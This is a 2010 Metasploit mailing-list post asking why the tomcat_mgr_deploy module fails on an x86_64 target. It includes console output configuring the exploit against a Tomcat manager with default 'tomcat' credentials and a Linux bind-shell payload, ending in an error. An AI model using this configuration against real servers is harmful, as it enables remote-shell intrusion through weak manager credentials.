Metasploit mailing list archives

tomcat_mgr_deploy fails on x86_64

From: Robin Wood <robin () digininja org>
Date: Wed, 27 Oct 2010 15:46:18 +0100

I'm trying to run the tomcat_mgr_deploy against a machine that is
identified by nmap as linux 2.6.x and nessus as just a 2.6 kernel.
Automatic targeting chooses x86_64 and gives me the error below. If I
force x86 then the file is uploaded but then fails to create a
session.

Is this a bug or something I'm doing wrong?

Robin

msf exploit(tomcat_mgr_deploy) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager
app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     10.16.0.19       yes       The target address
   RPORT     8080             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VERBOSE   false            no        Enable verbose output
   VHOST                      no        HTTP server virtual host

Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  443              yes       The listen port
   RHOST  10.16.0.19       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > exploit

[*] Attempting to automatically select a target...
[*] Started bind handler
[*] Automatically selected target "Linux X86_64"
[-] Exploit exception: undefined method `unpack' for nil:NilClass
[*] Exploit completed, but no session was created.
msf exploit(tomcat_mgr_deploy) >